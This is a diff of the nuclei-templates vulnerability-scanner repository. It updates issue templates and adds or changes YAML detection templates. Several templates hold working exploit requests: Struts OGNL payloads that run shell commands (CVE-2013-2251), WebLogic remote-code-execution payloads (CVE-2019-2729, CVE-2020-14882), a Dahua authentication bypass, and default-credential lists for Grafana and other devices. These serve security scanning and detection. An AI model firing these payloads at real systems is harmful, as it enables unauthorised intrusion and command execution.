diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md
deleted file mode 100644
index c7e1e98e00..0000000000
--- a/.github/ISSUE_TEMPLATE/bug_report.md
+++ /dev/null
@@ -1,32 +0,0 @@
----
-name: Bug report
-about: Create a issue to help us improve
-title: "[Bug] "
-labels: ''
-assignees: ''
-
----
-
-**Nuclei version**
-
-```
-nuclei -version
-```
-
-**Nuclei template version**
-
-```
-cat ~/.nuclei-config.json
-```
-
-**Describe the bug**
-A clear and concise description of what the bug is.
-
-**Commands to reproduce**
-
-```
-nuclei -t xxx -target xxx
-```
-
-**Screenshots**
-If applicable, add screenshots to help explain your problem.
diff --git a/.github/ISSUE_TEMPLATE/config.yml b/.github/ISSUE_TEMPLATE/config.yml
new file mode 100644
index 0000000000..9d81aa509c
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/config.yml
@@ -0,0 +1,14 @@
+blank_issues_enabled: false
+
+contact_links:
+ - name: Ask an question / advise on using nuclei-templates
+ url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/q-a
+ about: Ask a question or request support for using nuclei-templates
+
+ - name: Share idea / feature to discuss for nuclei-templates
+ url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
+ about: Share idea / feature to discuss for nuclei-templates
+
+ - name: Connect with PD Team & Community (Discord)
+ url: https://discord.gg/projectdiscovery
+ about: Connect with PD Team & Community for direct communication
\ No newline at end of file
diff --git a/.github/ISSUE_TEMPLATE/false-positive.md b/.github/ISSUE_TEMPLATE/false-positive.md
index 866365bd95..3cc006eb06 100644
--- a/.github/ISSUE_TEMPLATE/false-positive.md
+++ b/.github/ISSUE_TEMPLATE/false-positive.md
@@ -1,30 +1,24 @@
---
name: False Positive
-about: 'Create an issue if you found false positive results. '
-title: "[false-positive] template-name "
+about: 'Issue for template producing false positive results.'
labels: 'false-positive'
-assignees: ''
---
-**Nuclei version**
+
-```
-nuclei -version
-```
+### Nuclei Version:
-**Nuclei template version**
+
-```
-cat ~/.nuclei-config.json
-```
+### Template file:
-**Template ID**
+
-Please submit the ID template producing false-positive results.
+### Command to reproduce:
-**Commands to Reproduce**
+
+
-```
-nuclei -t template_id -target ?
-```
+### Anything else:
+
\ No newline at end of file
diff --git a/.github/ISSUE_TEMPLATE/feature_request.md b/.github/ISSUE_TEMPLATE/feature_request.md
index fbb3ffc5ad..cb6be4c6be 100644
--- a/.github/ISSUE_TEMPLATE/feature_request.md
+++ b/.github/ISSUE_TEMPLATE/feature_request.md
@@ -1,16 +1,18 @@
---
name: Feature request
-about: Suggest an idea to improve nuclei templates
-title: "[Feature] "
-labels: ''
-assignees: ''
-
+about: Request feature to implement in this project
+labels: 'Type: Enhancement'
---
-**Is your feature request related to a problem? Please describe.**
+
-A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
+### Please describe your feature request:
+
-**Describe the solution you'd like**
-
-A clear and concise description of what you want to happen.
+### Describe the use case of this feature:
+
diff --git a/.github/ISSUE_TEMPLATE/issue-report.md b/.github/ISSUE_TEMPLATE/issue-report.md
new file mode 100644
index 0000000000..c6f6f07f53
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/issue-report.md
@@ -0,0 +1,21 @@
+---
+name: Issue report
+about: "Issue to report invalid template"
+labels: 'Type: Bug'
+
+---
+
+
+
+
+
+### Issue description:
+
+
+
+### Anything else:
+
\ No newline at end of file
diff --git a/.github/ISSUE_TEMPLATE/submit-template.md b/.github/ISSUE_TEMPLATE/submit-template.md
index c929e00068..b7aa1c4938 100644
--- a/.github/ISSUE_TEMPLATE/submit-template.md
+++ b/.github/ISSUE_TEMPLATE/submit-template.md
@@ -1,15 +1,23 @@
---
-name: Submit Template
-about: Submit nuclei template using issue
-title: "[nuclei-template] template-name"
+name: Template Contribution
+about: Contributing nuclei template using GitHub Issue
labels: 'nuclei-template'
-assignees: ''
-
---
-**Template Details**
+### Template Information:
+
+
+
+
+
+### Nuclei Template:
+
+
+
```yaml
-nuclei template goes here
```
+
+
+
\ No newline at end of file
diff --git a/.nuclei-ignore b/.nuclei-ignore
index 26f85418fb..bef00b4d7a 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -14,8 +14,3 @@ tags:
# files is a list of files to ignore template execution
# unless asked for by the user.
-
-files:
- - "token-spray/"
-
-
diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml
index d322c7908c..67158a4a69 100644
--- a/cves/2013/CVE-2013-2251.yaml
+++ b/cves/2013/CVE-2013-2251.yaml
@@ -11,25 +11,19 @@ info:
requests:
- raw:
- |
- GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
+ GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
- Connection: close
Accept: */*
- Accept-Language: en
- |
- GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
+ GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
- Connection: close
Accept: */*
- Accept-Language: en
- |
- GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
+ GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: {{Hostname}}
- Connection: close
Accept: */*
- Accept-Language: en
payloads:
params:
@@ -40,11 +34,12 @@ requests:
matchers-condition: and
matchers:
- type: status
+ condition: or
status:
- 200
- 400
- condition: or
+
- type: regex
+ part: body
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
- part: body
diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml
index 0f87ecde9f..7560cc422d 100644
--- a/cves/2017/CVE-2017-17562.yaml
+++ b/cves/2017/CVE-2017-17562.yaml
@@ -91,15 +91,16 @@ requests:
- webviewer
- welcome
- attack: sniper
stop-at-first-match: true
matchers-condition: and
matchers:
+
- type: status
status:
- 200
+
- type: word
+ condition: and
words:
- "environment variable"
- - "display library search paths"
- condition: and
+ - "display library search paths"
\ No newline at end of file
diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml
index 163e4ead10..24cfb039e5 100644
--- a/cves/2019/CVE-2019-17382.yaml
+++ b/cves/2019/CVE-2019-17382.yaml
@@ -22,14 +22,16 @@ requests:
payloads:
ids: helpers/wordlists/numbers.txt
- attack: sniper
+
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
+
- type: status
status:
- 200
+
- type: word
words:
- "Dashboard"
diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml
new file mode 100644
index 0000000000..b28e4ae9bf
--- /dev/null
+++ b/cves/2019/CVE-2019-2729.yaml
@@ -0,0 +1,32 @@
+id: CVE-2019-2729
+
+info:
+ name: Oracle WebLogic Server Administration Console Handle RCE
+ author: igibanez
+ severity: critical
+ description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2019-2729
+ tags: cve,cve2019,oracle,rce,weblogic
+
+requests:
+ - raw:
+ - |
+ POST /wls-wsat/CoordinatorPortType HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml
+
+ xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7ResultBaseExececho${IFS}9272-9102-EVC|revconnectionHandlertrue]]>
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "CVE-2019-2729"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml
index 382be20081..e36159a674 100644
--- a/cves/2020/CVE-2020-14882.yaml
+++ b/cves/2020/CVE-2020-14882.yaml
@@ -28,8 +28,7 @@ requests:
- |
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}}
- cmd: §exec§
- Connection: close
+ cmd: {{exec}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
@@ -41,12 +40,12 @@ requests:
matchers-condition: and
matchers:
+
- type: regex
+ condition: or
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
- condition: or
- part: body
- type: status
status:
diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml
index dd62e8fa68..80017aa104 100644
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@@ -31,11 +31,12 @@ requests:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
- attack: sniper
matchers-condition: and
matchers:
+
- type: regex
+ condition: or
regex:
- "OS Name:.*Microsoft Windows"
- "Distributor ID:"
diff --git a/cves/2020/CVE-2020-9757.yaml b/cves/2020/CVE-2020-9757.yaml
index fac0befccd..20bf91e5e0 100644
--- a/cves/2020/CVE-2020-9757.yaml
+++ b/cves/2020/CVE-2020-9757.yaml
@@ -22,6 +22,8 @@ requests:
path:
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
+
+ skip-variables-check: true
matchers-condition: and
matchers:
- type: status
diff --git a/cves/2021/CVE-2021-20031.yaml b/cves/2021/CVE-2021-20031.yaml
new file mode 100644
index 0000000000..2dc86669e2
--- /dev/null
+++ b/cves/2021/CVE-2021-20031.yaml
@@ -0,0 +1,37 @@
+id: CVE-2021-20031
+
+info:
+ name: Sonicwall SonicOS 7.0 - Host Header Injection
+ author: gy741
+ severity: medium
+ description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
+ reference:
+ - https://www.exploit-db.com/exploits/50414
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20031
+ metadata:
+ google-dork: inurl:"auth.html" intitle:"SonicWall"
+ tags: cve,cve2021,sonicwall,redirect
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-20031
+ cwe-id: CWE-601
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{randstr}}.tld
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'https://{{randstr}}.tld/auth.html'
+ - 'Please be patient as you are being re-directed'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-33044.yaml b/cves/2021/CVE-2021-33044.yaml
new file mode 100644
index 0000000000..7797b9e08e
--- /dev/null
+++ b/cves/2021/CVE-2021-33044.yaml
@@ -0,0 +1,54 @@
+id: CVE-2021-33044
+
+info:
+ name: Dahua IPC/VTH/VTO devices Authentication Bypass
+ author: gy741
+ severity: critical
+ description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
+ reference:
+ - https://github.com/dorkerdevil/CVE-2021-33044
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-33044
+ - https://seclists.org/fulldisclosure/2021/Oct/13
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-33044
+ cwe-id: CWE-287
+ tags: dahua,cve,cve2021,auth-bypass
+
+requests:
+ - raw:
+ - |
+ POST /RPC2_Login HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/javascript, */*; q=0.01
+ Connection: close
+ X-Requested-With: XMLHttpRequest
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Origin: http://{{Hostname}}/
+ Referer: http://{{Hostname}}/
+
+ {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
+
+ matchers-condition: and
+ matchers:
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - "true"
+ - "id"
+ - "params"
+ - "session"
+ condition: and
+
+ extractors:
+ - type: regex
+ group: 1
+ part: body
+ regex:
+ - ',"result":true,"session":"([a-z]+)"\}'
diff --git a/default-logins/grafana/grafana-default-login.yaml b/default-logins/grafana/grafana-default-login.yaml
index 30f759b9cb..125010431f 100644
--- a/default-logins/grafana/grafana-default-login.yaml
+++ b/default-logins/grafana/grafana-default-login.yaml
@@ -1,4 +1,5 @@
id: grafana-default-login
+
info:
name: Grafana Default Login
author: pdteam
@@ -26,7 +27,6 @@ requests:
username:
- admin
- admin
-
password:
- prom-operator
- admin
@@ -35,16 +35,14 @@ requests:
matchers:
- type: word
words:
- - grafana_session
+ - "grafana_session" # Login cookie
part: header
- # Check for 'grafana_session' cookie on valid login in the response header.
- type: word
- words:
- - Logged in
part: body
- # Check for valid string on valid login.
+ words:
+ - "Logged in" # Logged in keyword
- type: status
status:
- - 200
+ - 200
\ No newline at end of file
diff --git a/default-logins/hp/hp-switch-default-login.yaml b/default-logins/hp/hp-switch-default-login.yaml
index aa854686cb..beada2b11a 100644
--- a/default-logins/hp/hp-switch-default-login.yaml
+++ b/default-logins/hp/hp-switch-default-login.yaml
@@ -20,15 +20,13 @@ requests:
username:
- admin
- attack: sniper
-
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- '"redirect": "/htdocs/pages/main/main.lsp"'
- '"error": ""'
- condition: and
- type: status
status:
diff --git a/default-logins/idemia/idemia-biometrics-default-login.yaml b/default-logins/idemia/idemia-biometrics-default-login.yaml
index 9c7aa9d12a..959da5926b 100644
--- a/default-logins/idemia/idemia-biometrics-default-login.yaml
+++ b/default-logins/idemia/idemia-biometrics-default-login.yaml
@@ -18,22 +18,21 @@ requests:
payloads:
password:
- - 12345
- attack: sniper
+ - "12345"
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- "session_id="
- "resource"
- condition: and
- type: word
- words:
- - "Invalid Password"
part: body
negative: true
+ words:
+ - "Invalid Password"
- type: status
status:
diff --git a/exposed-panels/alienvault-usm.yaml b/exposed-panels/alienvault-usm.yaml
new file mode 100644
index 0000000000..e9d7abbcf2
--- /dev/null
+++ b/exposed-panels/alienvault-usm.yaml
@@ -0,0 +1,23 @@
+id: alienVault-usm
+
+info:
+ name: AlienVault USM
+ author: dhiyaneshDK
+ severity: info
+ tags: panel
+ metadata:
+ shodan: 'http.title:"AlienVault USM"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/ossim/session/login.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'AlienVault USM'
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/exsi-system.yaml b/exposed-panels/exsi-system.yaml
new file mode 100644
index 0000000000..709f85f239
--- /dev/null
+++ b/exposed-panels/exsi-system.yaml
@@ -0,0 +1,23 @@
+id: exsi-system
+
+info:
+ name: ESXi System
+ author: dhiyaneshDK
+ severity: info
+ tags: panel
+ metadata:
+ shodan: 'html:"esxUiApp"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/ui/#/login'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'ng-app="esxUiApp"'
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/samsung-printer-detect.yaml b/exposed-panels/samsung-printer-detect.yaml
new file mode 100644
index 0000000000..c4e1f09352
--- /dev/null
+++ b/exposed-panels/samsung-printer-detect.yaml
@@ -0,0 +1,24 @@
+id: samsung-printer-detect
+
+info:
+ name: SAMSUNG Printer Detection
+ author: pussycat0x
+ severity: info
+ tags: iot,panel
+ metadata:
+ fofa-dork: 'app="SAMSUNG-Printer"'
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/sws/index.html"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '<title> SyncThru Web Service '
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/exposed-panels/sql-monitor.yaml b/exposed-panels/sql-monitor.yaml
new file mode 100644
index 0000000000..d736a98730
--- /dev/null
+++ b/exposed-panels/sql-monitor.yaml
@@ -0,0 +1,23 @@
+id: sql-monitor
+
+info:
+ name: SQL Monitor
+ author: dhiyaneshDK
+ severity: info
+ tags: panel
+ metadata:
+ shodan: 'html:"SQL Monitor"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'JavaScript needs to be enabled for SQL Monitor to work properly.
'
+ - type: status
+ status:
+ - 200
diff --git a/exposures/configs/github-workflows-disclosure.yaml b/exposures/configs/github-workflows-disclosure.yaml
index af981920a3..e7d9ea7f28 100644
--- a/exposures/configs/github-workflows-disclosure.yaml
+++ b/exposures/configs/github-workflows-disclosure.yaml
@@ -36,6 +36,7 @@ requests:
- "{{BaseURL}}/.github/workflows/ci-daily.yml"
- "{{BaseURL}}/.github/workflows/ci-issues.yml"
- "{{BaseURL}}/.github/workflows/smoosh-status.yml"
+ - "{{BaseURL}}/.github/workflows/snyk.yml"
matchers-condition: and
matchers:
diff --git a/exposures/configs/gruntfile-exposure.yaml b/exposures/configs/gruntfile-exposure.yaml
new file mode 100644
index 0000000000..a4fddba012
--- /dev/null
+++ b/exposures/configs/gruntfile-exposure.yaml
@@ -0,0 +1,29 @@
+id: gruntfile-exposure
+
+info:
+ name: Gruntfile Exposure
+ author: sbani
+ severity: info
+ reference: https://gruntjs.com/sample-gruntfile
+ tags: config,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Gruntfile.js"
+ - "{{BaseURL}}/Gruntfile.coffee"
+
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ condition: and
+ words:
+ - "module.exports"
+ - "grunt"
+
+ - type: status
+ status:
+ - 200
diff --git a/exposures/configs/jetbrains-datasources.yaml b/exposures/configs/jetbrains-datasources.yaml
new file mode 100644
index 0000000000..2be4dd0504
--- /dev/null
+++ b/exposures/configs/jetbrains-datasources.yaml
@@ -0,0 +1,24 @@
+id: jetbrains-datasource
+
+info:
+ name: Jetbrains IDE DataSources exposure
+ author: FlorianMaak
+ severity: info
+ description: Contains uuid of datasource to retrieve via .idea/dataSources/{uuid}.xml to expose database structure.
+ tags: config,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/.idea/dataSources.xml"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DataSourceManagerImpl"
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/exposures/configs/prometheus-config-endpoint.yaml b/exposures/configs/prometheus-config-endpoint.yaml
new file mode 100644
index 0000000000..bfc9ce9b45
--- /dev/null
+++ b/exposures/configs/prometheus-config-endpoint.yaml
@@ -0,0 +1,32 @@
+id: prometheus-config-endpoint
+
+info:
+ name: Prometheus config API endpoint
+ author: geeknik
+ severity: info
+ description: The config endpoint returns the loaded Prometheus configuration file. This file also contains addresses of targets and alerting/discovery services alongside the credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder (although this still leaks the username).
+ reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
+ tags: prometheus,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/v1/status/config"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'job_name:'
+ - '{"status":"success","data":'
+ - 'targets:'
+ condition: and
+
